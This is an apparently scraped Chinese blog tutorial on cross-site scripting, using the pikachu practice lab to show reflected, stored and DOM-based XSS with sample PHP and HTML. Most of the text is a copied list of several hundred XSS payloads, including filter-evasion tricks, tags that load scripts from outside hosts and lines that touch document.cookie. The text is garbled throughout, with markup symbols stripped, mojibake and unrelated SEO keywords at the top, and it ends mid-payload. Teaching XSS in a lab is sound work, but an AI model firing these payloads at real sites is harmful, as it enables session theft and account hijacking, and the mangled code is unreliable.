肃州区住房和城乡建设局网站,检测网站安全,wordpress 修改栏目,百度推广关键词怎么优化以pikachu靶场为例子进行讲解#xff0c;pikachu靶场的搭建请参考以下博客#xff1b;
【网路安全 --- pikachu靶场安装】超详细的pikachu靶场安装教程#xff08;提供靶场代码及工具#xff09;_网络安全_Aini的博客-CSDN博客【网路安全 --- pikachu靶场安装】超详细的pi…以pikachu靶场为例子进行讲解pikachu靶场的搭建请参考以下博客
【网路安全 --- pikachu靶场安装】超详细的pikachu靶场安装教程提供靶场代码及工具_网络安全_Aini的博客-CSDN博客【网路安全 --- pikachu靶场安装】超详细的pikachu靶场安装教程提供靶场代码及工具https://blog.csdn.net/m0_67844671/article/details/133682360?spm1001.2014.3001.5502
一什么是XSS漏洞 XSS全称Cross Site Scripting跨站脚本攻击为了避免和CSS层叠样式表名称冲突所以改为了XSS是最常见的Web应用程序安全漏洞之一位于OWASP top 10 2013/2017年度分别为第s三名和第七名XSS是指攻击者在网页中嵌入客户端脚本通常是JavaScript编写的危险代码当用户使用浏览器浏览网页时脚本就会在用户的浏览器上执行从而达到攻击者的目的 XSS攻击最终目的是在网页中嵌入客户端恶意脚本代码最常用的攻击代码是javascript语言但也会使用其它的脚本语言例如ActionScript、VBscript。而如今的互联网客户端脚本基本是基于Javascript,所以如果想要深入研究XSS必须要精通Javascript。 XSS漏洞图解 二XSS漏洞出现的原因 程序对输入和输出的控制不够严格,导致恶意的攻击的脚本输入后,在输出到前端时被浏览器当作有效代码解析执行从而产生危害. 三XSS的危害 1、首先对于那些半年没有更新的小企业网站来说发生XSS漏洞几乎没有什么用。一般在各类的社交平台邮件系统开源流行的Web应用BBS微博等场景中造成的杀伤力却十分强大。 2、劫持用户cookie是最常见的跨站攻击形式通过在网页中写入并执行脚本执行文件多数情况下是JavaScript脚本代码劫持用户浏览器将用户当前使用的sessionID信息发送至攻击者控制的网站或服务器中。 3、框架钓鱼。利用JS脚本的基本功能之一操作网页中的DOM树结构和内容在网页中通过JS脚本生成虚假的页面欺骗用户执行操作而用户所有的输入内容都会被发送到攻击者的服务器上。 4、挂马水坑攻击 5、有局限性的键盘记录 还有很多很多......... 四XSS的分类
4-1 反射型中低危
交互的数据一般不会被存在在数据库里面,只是简单的把用户输入的数据反射给浏览器一次性所见即所得。 就比如下面这段代码服务端拿到name以后原木原样输出到客户端
?php$name $_GET[name];echo Welcome $namebr;
?
比如我们在服务端新建一个xss.php,把上面的代码复制粘贴进去 浏览器访问 ,需要一个参数为name,那我们传递一个name参数值为随便 这个代码很明显没有数据库注入漏洞但是存在xss漏洞因为这段代码并没有对用户的参数数据进行过滤处理。
攻击方法 scriptconfirm(1)/script 其中 我们称之为完成闭合符号后面跟script标签来进行攻击弹出了窗口表示我们的js代码被执行了。
输入payload以后就回车发请求 我们看到这执行了说明存在xss漏洞攻击成功了当然了这只是简单验证通过js写一个功能性代码可以实现更多的事情 其实xss的代码手段非常多因为别人可能通过过滤等手段对script标签做了限制那么你想攻击的话就要改变方式所以攻击代码的写法非常多。 现在以pikachu靶场为例 我输入了aaa,发现页面上显示who is aaa,i dontt care . 我们输入的信息能在页面上打印可能存在xss漏洞用payload试一下 scriptconfirm(1)/script
我输入了payload发现输入不全原来是前端做了长度限制不过这个限制很好绕过的直接在下面框框的地方把20改为200可以直接改的 改完以后回车然后再把payload复制粘贴然后点击提交 看到攻击成功了 对比一下正常输出的p标签跟payload以后的p标签有什么区别
正常输出时的p标签 攻击成功后的p标签
payload 是 scriptconfirm(1)/script 原来就是通过插入script标签来注入恶意代码的
4-2 持久性高危
持久性也叫存储型XSS交互的数据会被存在在数据库里面,永久性存储,具有很强的稳定性。
示例 scriptconfirm(1)/script 确定以后页面就剩下了其余的当script标签输出在页面了而且整个payload已经存出来数据库了每次一打开这个页面都会从数据库读取数据加载到页面每次都会受到攻击 比如刷新一下页面看看 说明这个攻击代码存储到了数据库里面每次刷新页面的时候都会加载这个数据执行这个js代码所以这种存储型漏洞很严重。
我们看一下他的后台代码,发现我们输入的payload到了后台以后会存储到数据库中当我们每次打开这个页面的时候会从数据库读取数据渲染页面从数据库读取的恶意代码就执行了。
if(array_key_exists(message,$_POST) $_POST[message]!null){$messageescape($link, $_POST[message]);$queryinsert into message(content,time) values($message,now());$resultexecute($link, $query);if(mysqli_affected_rows($link)!1){$html.p数据库出现异常提交失败/p;}
}
4-3 DOM型中低危 通过前端的dom节点形成的XSS漏洞,如下面的代码没有前后端交互文本框输入的内容直接输出到页面
!DOCTYPE html
html
headtitle输入框提交示例/titlescriptfunction submitForm() {var inputText document.getElementById(inputText).value;var result document.getElementById(result);if (inputText.trim() ) {result.innerText 不能提交空内容;} else {result.innerText inputText;}}/script
/head
bodyh1输入框提交示例/h1input typetext idinputTextbutton onclicksubmitForm()提交/buttonp idresult/p
/body
/html 一般不与后台服务器产生数据交互属于中低危漏洞了。
可能触发DOM型XSS的js操作 document.referer window.name location innerHTML document.write 闭合标签 οnclickalert(1111) οnclickalert(xss) img src# οnmοuseοveralert(xss) a href/ascriptalert(1);/scriptwhat do you see?/a 示例 当我们输入正常内容发现输出到了a标签的href属性里我们就想办法闭合href属性
构造payload如下 xxx οnclickalert(123)
执行以后发现语法上没问题确实闭合了a标签添加了一个onclick属性但是整体被转义了所以攻击失败 可以构造payload xx οnclickalert(123) 点击以后确实看到效果了
现在看一看攻击以后渲染的效果 xx οnclickalert(123) 五XSS常用payload
下面是我找的比价全的xsspayload来自以下博客可以参考一下
XSS-Payload大全_xsspayload大全_gy1bubble的博客-CSDN博客
body oninputjavascript:alert(1)input autofocus
math hrefjavascript:javascript:alert(1)CLICKME/math math maction actiontypestatusline#http://google.com xlink:hrefjavascript:javascript:alert(1)CLICKME/maction /math
frameset onloadjavascript:alert(1)
table backgroundjavascript:javascript:alert(1)
!--img src--img srcx onerrorjavascript:alert(1)//
commentimg src/commentimg srcx onerrorjavascript:alert(1))//
![img src]img srcx onerrorjavascript:alert(1)//
styleimg src/styleimg srcx onerrorjavascript:alert(1)//
li stylelist-style:url() onerrorjavascript:alert(1) div stylecontent:url(data:image/svgxml,%%3Csvg/%%3E);visibility:hidden onloadjavascript:alert(1)/div
headbase hrefjavascript:///headbodya href/. /,javascript:alert(1)//#XXX/a/body
SCRIPT FORdocument EVENTonreadystatechangejavascript:alert(1)/SCRIPT
OBJECT CLASSIDclsid:333C7BC4-460F-11D0-BC04-0080C7055A83PARAM NAMEDataURL VALUEjavascript:alert(1)/OBJECT
object datadata:text/html;base64,%(base64)s
embed srcdata:text/html;base64,%(base64)s
b scriptalert(1)/script0
div iddiv1input valueonmouseoverjavascript:alert(1)/div div iddiv2/divscriptdocument.getElementById(div2).innerHTML document.getElementById(div1).innerHTML;/script
x foox fooimg srcx onerrorjavascript:alert(1)//
embed srcjavascript:alert(1)
img srcjavascript:alert(1)
image srcjavascript:alert(1)
script srcjavascript:alert(1)
div stylewidth:1px;filter:glow onfilterchangejavascript:alert(1)x
? fooscriptjavascript:alert(1)/script
! fooscriptjavascript:alert(1)/script
/ fooscriptjavascript:alert(1)/script
? foox foo?scriptjavascript:alert(1)/script
! foo[[[Inception]]x foo]fooscriptjavascript:alert(1)/script
% foox foo%scriptjavascript:alert(1)/script
div iddx xmlnsiframe onloadjavascript:alert(1)/div scriptd.innerHTMLd.innerHTML/script
img \x00srcx onerroralert(1)
img \x47srcx onerrorjavascript:alert(1)
img \x11srcx onerrorjavascript:alert(1)
img \x12srcx onerrorjavascript:alert(1)
img\x47srcx onerrorjavascript:alert(1)
img\x10srcx onerrorjavascript:alert(1)
img\x13srcx onerrorjavascript:alert(1)
img\x32srcx onerrorjavascript:alert(1)
img\x47srcx onerrorjavascript:alert(1)
img\x11srcx onerrorjavascript:alert(1)
img \x47srcx onerrorjavascript:alert(1)
img \x34srcx onerrorjavascript:alert(1)
img \x39srcx onerrorjavascript:alert(1)
img \x00srcx onerrorjavascript:alert(1)
img src\x09x onerrorjavascript:alert(1)
img src\x10x onerrorjavascript:alert(1)
img src\x13x onerrorjavascript:alert(1)
img src\x32x onerrorjavascript:alert(1)
img src\x12x onerrorjavascript:alert(1)
img src\x11x onerrorjavascript:alert(1)
img src\x00x onerrorjavascript:alert(1)
img src\x47x onerrorjavascript:alert(1)
img srcx\x09onerrorjavascript:alert(1)
img srcx\x10onerrorjavascript:alert(1)
img srcx\x11onerrorjavascript:alert(1)
img srcx\x12onerrorjavascript:alert(1)
img srcx\x13onerrorjavascript:alert(1)
img[a][b][c]src[d]x[e]onerror[f]alert(1)
img srcx onerror\x09javascript:alert(1)
img srcx onerror\x10javascript:alert(1)
img srcx onerror\x11javascript:alert(1)
img srcx onerror\x12javascript:alert(1)
img srcx onerror\x32javascript:alert(1)
img srcx onerror\x00javascript:alert(1)
a hrefjava:javascript:alert(1)XXX/a
img srcx scriptjavascript:alert(1)/script
img src onerror / altjavascript:alert(1)//
title onpropertychangejavascript:alert(1)/titletitle title
a hrefhttp://foo.bar/#xy/aimg altimg srcx:x onerrorjavascript:alert(1)/a
!--[if]scriptjavascript:alert(1)/script --
!--[ifimg srcx onerrorjavascript:alert(1)//] --
script src/\%(jscript)s/script
script src\\%(jscript)s/script
object idx classidclsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598/object object classidclsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B onqt_errorjavascript:alert(1) stylebehavior:url(#x);param namepostdomevents //object
a style-o-link:javascript:javascript:alert(1);-o-link-source:currentX
stylep[foobar{}*{-o-link:javascript:javascript:alert(1)}{}*{-o-link-source:current}]{color:red};/style
link relstylesheet hrefdata:,*%7bx:expression(javascript:alert(1))%7d
styleimport data:,*%7bx:expression(javascript:alert(1))%7D;/style
a stylepointer-events:none;position:absolute;a styleposition:absolute; onclickjavascript:alert(1);XXX/a/aa hrefjavascript:javascript:alert(1)XXX/a
style*[{}import%(css)s?]/styleX
div stylefont-family:foo ;color:red;;XXX
div stylefont-family:foo}colorred;XXX
// stylex:expression\28javascript:alert(1)\29
style*{x:ĂÂĂÂĂÂĂÂĂÂĂÂĂÂĂÂĂÂĂÂĂÂĂÂĂÂĂÂĂÂĂÂĂÂĂÂĂÂĂÂĂÂĂÂĂÂĂÂĂÂĂÂĂÂĂÂĂÂĂÂ(javascript:alert(1))}/style
div stylecontent:url(%(svg)s)/div
div stylelist-style:url(http://foo.f)\20url(javascript:javascript:alert(1));X
div idddiv stylefont-family:sans\27\3B color\3Ared\3BX/div/div scriptwith(document.getElementById(d))innerHTMLinnerHTML/script
div stylebackground:url(/f#oo/;color:red/*/foo.jpg);X
div stylefont-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);X
div idxXXX/div style #x{font-family:foo[bar;color:green;} #y];color:red;{} /style
x stylebackground:url(x;color:red;/*)XXX/x
script({set/**/$($){_/**/setter$,_javascript:alert(1)}}).$eval/script
script({0:#0eval/#0#/#0#(javascript:alert(1))})/script
scriptReferenceError.prototype.__defineGetter__(name, function(){javascript:alert(1)}),x/script
scriptObject.__noSuchMethod__ Function,[{}][0].constructor._(javascript:alert(1))()/script
meta charsetx-imap4-modified-utf7ADzAGnAG0AEfACAAHMAHIAGOAD0AGnACAAG8AbgAGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQACAAPABi
meta charsetx-imap4-modified-utf7scriptS1TS1alertA7(1)RUA;A911/scriptX
meta charsetmac-farsiÄÂÄšĹscriptÄÂĚŞjavascript:alert(1)ÄÂÄšĹ/scriptÄÂĚŞ
Xx stylebehavior:url(#default#time2) onbeginjavascript:alert(1)
1set/xmlnsurn:schemas-microsoft-com:time stylebehA:url(#default#time2) attributenameinnerhtml toimg/srcxonerrorjavascript:alert(1)
IMG SRCjav ascript:alert(XSS);
perl -e print IMG SRCjava\0script:alert(\XSS\); out
IMG SRC javascript:alert(XSS);
SCRIPT/XSS SRChttp://ha.ckers.org/xss.js/SCRIPT
BODY onload!#$%()*~-_.,:;?[/|\]^alert(XSS)
SCRIPT/SRChttp://ha.ckers.org/xss.js/SCRIPT
SCRIPTalert(XSS);///SCRIPT
SCRIPT SRChttp://ha.ckers.org/xss.js? B
SCRIPT SRC//ha.ckers.org/.j
IMG SRCjavascript:alert(XSS)
iframe srchttp://ha.ckers.org/scriptlet.html
\;alert(XSS);//
/TITLESCRIPTalert(XSS);/SCRIPT
INPUT TYPEIMAGE SRCjavascript:alert(XSS);
BODY BACKGROUNDjavascript:alert(XSS)
IMG DYNSRCjavascript:alert(XSS)
IMG LOWSRCjavascript:alert(XSS)
STYLEli {list-style-image: url(javascript:alert(XSS));}/STYLEULLIXSS/br
IMG SRCvbscript:msgbox(XSS)
IMG SRClivescript:[code]
BODY ONLOADalert(XSS)
BGSOUND SRCjavascript:alert(XSS);
BR SIZE{alert(XSS)}
LINK RELstylesheet HREFjavascript:alert(XSS);
LINK RELstylesheet HREFhttp://ha.ckers.org/xss.css
STYLEimporthttp://ha.ckers.org/xss.css;/STYLE
META HTTP-EQUIVLink Contenthttp://ha.ckers.org/xss.css; RELstylesheet
STYLEBODY{-moz-binding:url(http://ha.ckers.org/xssmoz.xml#xss)}/STYLE
STYLEim\port\ja\vasc\ript:alert(XSS);/STYLE
IMG STYLExss:expr/*XSS*/ession(alert(XSS))
exp/*A STYLEno\xss:noxss(*//*);xss:ex/*XSS*//*/*/pression(alert(XSS))
STYLE TYPEtext/javascriptalert(XSS);/STYLE
STYLE.XSS{background-image:url(javascript:alert(XSS));}/STYLEA CLASSXSS/A
STYLE typetext/cssBODY{background:url(javascript:alert(XSS))}/STYLE
STYLE typetext/cssBODY{background:url(javascript:alert(XSS))}/STYLE
XSS STYLExss:expression(alert(XSS))
XSS STYLEbehavior: url(xss.htc);
ÄÂÄšĹscriptÄÂĚŞalert(ÄÂĂÂXSSÄÂĂÂ)ÄÂÄšĹ/scriptÄÂĚŞ
META HTTP-EQUIVrefresh CONTENT0;urljavascript:alert(XSS);
META HTTP-EQUIVrefresh CONTENT0;urldata:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K
META HTTP-EQUIVrefresh CONTENT0; URLhttp://;URLjavascript:alert(XSS);
IFRAME SRCjavascript:alert(XSS);/IFRAME
IFRAME SRC# onmouseoveralert(document.cookie)/IFRAME
FRAMESETFRAME SRCjavascript:alert(XSS);/FRAMESET
TABLE BACKGROUNDjavascript:alert(XSS)
TABLETD BACKGROUNDjavascript:alert(XSS)
DIV STYLEbackground-image: url(javascript:alert(XSS))
DIV STYLEbackground-image:\0075\0072\006C\0028\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029\0029
DIV STYLEbackground-image: url(javascript:alert(XSS))
DIV STYLEwidth: expression(alert(XSS));
BASE HREFjavascript:alert(XSS);//
OBJECT TYPEtext/x-scriptlet DATAhttp://ha.ckers.org/scriptlet.html/OBJECT
EMBED SRCdata:image/svgxml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCIYWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg typeimage/svgxml AllowScriptAccessalways/EMBED
SCRIPT SRChttp://ha.ckers.org/xss.jpg/SCRIPT
!--#exec cmd/bin/echo SCR--!--#exec cmd/bin/echo IPT SRChttp://ha.ckers.org/xss.js/SCRIPT--
? echo(SCR);echo(IPTalert(XSS)/SCRIPT); ?
IMG SRChttp://www.thesiteyouareon.com/somecommand.php?somevariablesmaliciouscode
Redirect 302 /a.jpg http://victimsite.com/admin.aspdeleteuser
META HTTP-EQUIVSet-Cookie ContentUSERIDSCRIPTalert(XSS)/SCRIPT
HEADMETA HTTP-EQUIVCONTENT-TYPE CONTENTtext/html; charsetUTF-7 /HEADADw-SCRIPTAD4-alert(XSS);ADw-/SCRIPTAD4-
SCRIPT a SRChttp://ha.ckers.org/xss.js/SCRIPT
SCRIPT SRChttp://ha.ckers.org/xss.js/SCRIPT
SCRIPT a SRChttp://ha.ckers.org/xss.js/SCRIPT
SCRIPT a SRChttp://ha.ckers.org/xss.js/SCRIPT
SCRIPT a SRChttp://ha.ckers.org/xss.js/SCRIPT
SCRIPT a SRChttp://ha.ckers.org/xss.js/SCRIPT
SCRIPTdocument.write(SCRI);/SCRIPTPT SRChttp://ha.ckers.org/xss.js/SCRIPT
A HREFhttp://66.102.7.147/XSS/A
A HREFhttp://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6DXSS/A
A HREFhttp://1113982867/XSS/A
A HREFhttp://0x42.0x0000066.0x7.0x93/XSS/A
A HREFhttp://0102.0146.0007.00000223/XSS/A
A HREFhtt p://6 6.000146.0x7.147/XSS/A
iframe src javascript:prompt(1)
svgstyle{font-family:iframe/onloadconfirm(1)
input/onmouseoverjavaSCRIPT:confirm(1)
sVgscRipt alert(1) {Opera}
img/src onerrorthis.onerrorconfirm(1)
formisindex formactionjavascript:confirm(1)
img src onerroralert(1)
script/ srchttps://dl.dropbox.com/u/13018058/js.js / /script
ScRipT 5-0*39/3prompt(1)/ScRipT giveanswerhere?
iframe/srcdata:text/html; base64 ,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg
script /**//**/alert(1)/**//script /**/
h1/onmouseover\u0061lert(1)
iframe/srcdata:text/html,svg onloadalert(1)
meta content 1 ; JAVASCRIPT: alert(1) http-equivrefresh/
svgscript xlink:hrefdata:,window.open(https://www.google.com/)/script
svgscript x:hrefhttps://dl.dropbox.com/u/13018058/js.js {Opera}
meta http-equivrefresh content0;urljavascript:confirm(1)
iframe srcjavascript:alert(document.location)
forma hrefjavascript:\u0061lert(1)X
/scriptimg/*/srcworksinchrome:prompt(1)/*/onerroreval(src)
img/ src~ onerrorprompt(1)
formiframe srcjavascript:alert(1) ;
a hrefdata:application/x-x509-user-cert; base64 ,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg X/a
http://www.googlescript .comalert(document.location)/script
a href[] onmouseoverprompt(1)//XYZ/a
img/src onerror prompt(1)
style/onloadprompt(XSS)
script ^__^alert(String.fromCharCode(49))/script ^__^
/style script :-(/**/alert(document.location)/**//script :-(
/forminput typedate onfocusalert(1)
formtextarea onkeyup\u0061\u006C\u0065\u0072\u0074(1)
script /***//***/confirm(\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450)/***//script /***/
iframe srcdocbody onloadprompt(1)
a hrefjavascript:void(0) onmouseover javascript:alert(1) X/a
script ~~~alert(0%0)/script ~~~
style/onload!-- alert (1)
///style///span %2F onmousemovealert(1)SPAN
img/srchttp://i.imgur.com/P8mL8.jpg onmouseover prompt(1)
svgstyle{-o-link-source:body/onloadconfirm(1)
blink/ onmouseoverprompt(1)OnMouseOver {Firefox Opera}
marquee onstartjavascript:alert(1)^__^
div/stylewidth:expression(confirm(1))X/div {IE7}
iframe// srcjavaSCRIPT:alert(1)
//form/actionjavascript:alert(document.cookie)input/typesubmit//
/*iframe/src*/iframe/srciframe/src/onloadprompt(1) /*iframe/src*/
//|\\ script //|\\ srchttps://dl.dropbox.com/u/13018058/js.js //|\\ /script //|\\
/font/svgstyle{src:style/onloadthis.onloadconfirm(1)/font//style
a/hrefjavascript: javascript:prompt(1)input typeX
/plaintext\/|\plaintext/onmouseoverprompt(1)
/svgsvgscript AQuickBrownFoxJumpsOverTheLazyDogalert(1) {Opera}
a hrefjavascript:\u0061le%72t(1)button
div onmouseoveralert(1)DIV/div
iframe styleposition:absolute;top:0;left:0;width:100%;height:100% onmouseoverprompt(1)
a hrefjAvAsCrIpT:alert(1)X/a
embed srchttp://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf
object datahttp://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf
var onmouseoverprompt(1)On Mouse Over/var
a hrefjavascript:alert(document.cookie)Click Here/a
img src/ _ titleonerrorprompt(1)
%!--%scriptalert(1);/script --
script srcdata:text/javascript,alert(1)/script
iframe/src \/\/onload prompt(1)
iframe/onreadystatechangealert(1)
svg/onloadalert(1)
input valueiframe/srcjavascript:confirm(1)
input typetext value div/onmouseoveralert(1)X/div
iframe srcj a v a s c r i p t :a l e r t %28 1 %29/iframe
img srcxx:xxonerroralert(1)
object typetext/x-scriptlet datahttp://jsfiddle.net/XLE63/ /object
meta http-equivrefresh content0;javascript:alert(1)/
matha xlink:href//jsfiddle.net/t846h/click
embed codehttp://businessinfo.co.uk/labs/xss/xss.swf allowscriptaccessalways
svg contentScriptTypetext/vbsscriptMsgBox1
a hrefdata:text/html;base64_,svg/onload\u0061le%72t(1)X/a
iframe/onreadystatechange\u0061\u006C\u0065\u0072\u0074(\u0061) worksinIE
script~\u0061 ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~\u0061)/script U
script/srcdata:text%2Fj\u0061v\u0061script,\u0061lert(\u0061)/script a\u0061 /%2F
script/srcdata:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)/script
object datajavascript:\u0061le%72t(1)
script--1--alert(1)/script
body/onload!-- (1)
script itworksinallbrowsers/*script* */alert(1)/script
img src ?itworksonchrome?\/onerror alert(1)
svgscript// confirm(1);/script /svg
svgscript onlypossibleinopera:-) alert(1)
a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa hrefjaa:a(1)ClickMe
script x alert(1) /script 12
div/onmouseoveralert(1) stylex:
--img/src onerroralert(1) --!
script/srcdata:text/javascript,alert(1)/script
div styleposition:absolute;top:0;left:0;width:100%;height:100% onmouseoverprompt(1) onclickalert(1)x/button
img srcx onerrorwindow.open(https://www.google.com/);
formbutton formactionjavascript:alert(1)CLICKME
matha xlink:href//jsfiddle.net/t846h/click
object datadata:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik/object
iframe srcdata:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E/iframe
a hrefdata:text/html;blabla,script srchttp://sternefamily.net/foo.js/scriptClick Me/a
;!--XSS{()}
//\\,*
); alert(XSS
scriptalert(1);/script
scriptalert(XSS);/script
IMG SRCjavascript:alert(XSS);
IMG SRCjavascript:alert(XSS)
IMG SRCjavascript:alert(XSS)
IMG SRCjavascript:alert(XSS)
IMG SCRIPTalert(XSS)/SCRIPT
scrscriptiptalert(XSS);/scr/scriptipt
scriptalert(String.fromCharCode(88,83,83))/script
img srcfoo.png onerroralert(/xssed/) /
styleim\port\ja\vasc\ript:alert(\XSS\);/style
? echo(scr); echo(iptalert(\XSS\)/script); ?
marqueescriptalert(XSS)/script/marquee
IMG SRC\jav ascript:alert(XSS);\
IMG SRC\jav ascript:alert(XSS);\
IMG SRC\jav ascript:alert(XSS);\
IMG SRCjavascript:alert(String.fromCharCode(88,83,83))
scriptalert(0)/script
script srchttp://yoursite.com/your_files.js/script
/titlescriptalert(/xss/)/script
/textareascriptalert(/xss/)/script
IMG LOWSRC\javascript:alert(XSS)\
IMG DYNSRC\javascript:alert(XSS)\
font stylecolor:expression(alert(document.cookie))
img srcjavascript:alert(XSS)
script languageJavaScriptalert(XSS)/script
body onunloadjavascript:alert(XSS);
body onLoadalert(XSS);
[colorred onmouseoveralert(xss)]mouse over[/color]
//a/img src1.gif onerroralert(1)
window.alert(Bonjour !);
div stylex:expression((window.r1)?:eval(r1;
alert(String.fromCharCode(88,83,83));))
iframe?php echo chr(11)? onloadalert(XSS)/iframe
script alert(String.fromCharCode(88,83,83))/script
marqueeh1XSS/h1/marquee
scriptalert(XSS)/script
marqueeh1XSS/h1/marquee
META HTTP-EQUIV\refresh\ CONTENT\0;urljavascript:alert(XSS);\
META HTTP-EQUIV\refresh\ CONTENT\0; URLhttp://;URLjavascript:alert(XSS);\
scriptvar var 1; alert(var)/script
STYLE typetext/cssBODY{background:url(javascript:alert(XSS))}/STYLE
?SCRIPTalert(XSS)/SCRIPT?
IMG SRCvbscript:msgbox(\XSS\)onfocusalert(document.domain)
FRAMESETFRAME SRC\javascript:alert(XSS);\/FRAMESET
STYLEli {list-style-image: url(\javascript:alert(XSS)\);}/STYLEULLIXSS
perl -e print \SCR\0IPTalert(\XSS\)/SCR\0IPT\; out
perl -e print \IMG SRCjava\0script:alert(\XSS\)\; out
br size\{alert(XSS)}\
scrscriptiptalert(1)/scrscriptipt
/br stylea:expression(alert())
/scriptscriptalert(1)/script
BODY onload!#$%()*~-_.,:;?[/|\]^alert(XSS)
[colorred widthexpression(alert(123))][color]
BASE HREFjavascript:alert(XSS);//
Execute(MsgBox(chr(88)chr(83)chr(83)))
/iframescriptalert(123)/script
body onLoadwhile(true) alert(XSS);
/titlescriptalert(1111)/script
/textareascriptalert(document.cookie)/script
script languageJavaScript alert(X \nS \nS);/script
/script/scriptscriptscriptalert(123)/script
htmlnoalertnoscript(123)/noscriptscript(123)/script
INPUT TYPEIMAGE SRCjavascript:alert(XSS);
/selectscriptalert(123)/script
script src http://www.site.com/XSS.js/script
}/stylescriptaeval;balert;a(b(/XSS/.source));/script
SCRIPTdocument.write(XSS);/SCRIPT
aget;bURL;cjavascript:;dalert(xss);;eval(abcd);
scriptalert(xss)/script
scriptsrcsrchttp://yoursite.com/xss.js?69,69/script
body backgroundjavascript:scriptalert(navigator.userAgent)/script/body
/XaDoS/scriptalert(document.cookie)/scriptscript srchttp://www.site.com/XSS.js/script
/KinG-InFeT.NeT/scriptalert(document.cookie)/script
srchttp://www.site.com/XSS.js/script
data:text/html;charsetutf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQYWxlcnQoMTMzNyk8L3NjcmlwdD4
!-- /scriptalert(xss);/script
scriptalert(XSS by \nxss)/scriptmarqueeh1XSS by xss/h1/marquee
scriptalert(XSS by \nxss)/scriptmarqueeh1XSS by xss/h1/marquee
/titlescriptalert(XSS by \nxss)/scriptmarqueeh1XSS by xss/h1/marquee
img scriptalert(XSS by \nxss)/scriptmarqueeh1XSS by xss/h1/marquee
scriptalert(1337)/scriptmarqueeh1XSS by xss/h1/marquee
scriptalert(1337)/scriptscriptalert(XSS by \nxss/h1/marquee
/titlescriptalert(1337)/scriptmarqueeh1XSS by xss/h1/marquee
iframe srcjavascript:alert(XSS by \nxss);/iframemarqueeh1XSS by xss/h1/marquee
SCRIPTalert(String.fromCharCode(88,83,83))/SCRIPTimg src alt
SCRIPTalert(String.fromCharCode(88,83,83))/SCRIPTimg src alt
\SCRIPTalert(String.fromCharCode(88,83,83))/SCRIPTimg src alt\
http://www.simpatie.ro/index.php?pagefriendsmember781339javafunctionnamePageclickjavapgno2 javapgno2 ??XSS??
http://www.simpatie.ro/index.php?pagetop_moviescat13p2 p2 ??XSS??
); alert(xss); var x
\\); alert(\xss\);var x\
//--/SCRIPTSCRIPTalert(String.fromCharCode(88,83,83));
ScRiPt%20%0a%0dalert(561177485777)%3B/ScRiPt
img srcMario Heiderich says that svg SHOULD not be executed trough image tags onerrorjavascript:document.write(\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0064\u0061\u0074\u0061\u003a\u0069\u006d\u0061\u0067\u0065\u002f\u0073\u0076\u0067\u002b\u0078\u006d\u006c\u003b\u0062\u0061\u0073\u0065\u0036\u0034\u002c\u0050\u0048\u004e\u0032\u005a\u0079\u0042\u0034\u0062\u0057\u0078\u0075\u0063\u007a\u0030\u0069\u0061\u0048\u0052\u0030\u0063\u0044\u006f\u0076\u004c\u0033\u0064\u0033\u0064\u0079\u0035\u0033\u004d\u0079\u0035\u0076\u0063\u006d\u0063\u0076\u004d\u006a\u0041\u0077\u004d\u0043\u0039\u007a\u0064\u006d\u0063\u0069\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u0070\u0062\u0057\u0046\u006e\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0045\u0070\u0049\u006a\u0034\u0038\u004c\u0032\u006c\u0074\u0059\u0057\u0064\u006c\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u007a\u0064\u006d\u0063\u0067\u0062\u0032\u0035\u0073\u0062\u0032\u0046\u006b\u0050\u0053\u004a\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u0079\u004b\u0053\u0049\u002b\u0050\u0043\u0039\u007a\u0064\u006d\u0063\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0048\u004e\u006a\u0063\u006d\u006c\u0077\u0064\u0044\u0035\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u007a\u004b\u0054\u0077\u0076\u0063\u0032\u004e\u0079\u0061\u0058\u0042\u0030\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u006b\u005a\u0057\u005a\u007a\u0049\u0047\u0039\u0075\u0062\u0047\u0039\u0068\u005a\u0044\u0030\u0069\u0059\u0057\u0078\u006c\u0063\u006e\u0051\u006f\u004e\u0043\u006b\u0069\u0050\u006a\u0077\u0076\u005a\u0047\u0056\u006d\u0063\u007a\u